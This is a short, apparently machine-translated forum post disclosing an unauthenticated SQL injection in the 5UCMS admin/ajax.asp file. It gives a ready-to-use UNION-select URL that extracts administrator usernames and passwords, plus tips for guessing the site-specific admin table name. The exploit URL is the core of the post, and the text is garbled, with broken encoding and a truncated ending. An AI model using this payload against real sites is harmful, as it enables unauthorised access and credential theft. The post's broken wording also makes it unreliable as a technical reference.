Once accidentally found 5UCMS a small vulnerability. Vulnerability file
Background directory/ajax. asp
Due to the non-background user authentication, resulting in not logged in can also access this file, the file existssql injection.
I today into the official to see if the vulnerability they have issued a repair Bulletin, here I put use released directly to storm out of the background account password.
http://127.0.0.1/admin/ajax.asp?Act=modeext&cid=1%20and%2 0 1=2%20UNION%20select%2 0 1 1 1%26Chr(1 3)%26Chr(1 0)%26username%26chr(5 8)%2 6 1%26Chr(1 3)%26Chr(1 0)%26password%26chr(5 8)%20from xxxx_Admin&id=1%20and%2 0 1=2%20UNION%20select%2 0 1%20from xxxx_Admin
xxxx_Admin this table name are generally them at the time of installation a custom order, and are generally used domain name,such as www. xxx. com this station
The table name is probably qing_admin everyone their own modifications. Nothing technical content is generally novice storm does not come out so the only issue to
Honestly, their program is still relatively safe can get out of a also good. For those of us rookie said.
Show: True|False|ERR: Object required proof that the table name is Tim write error.
After the success of the is as follows: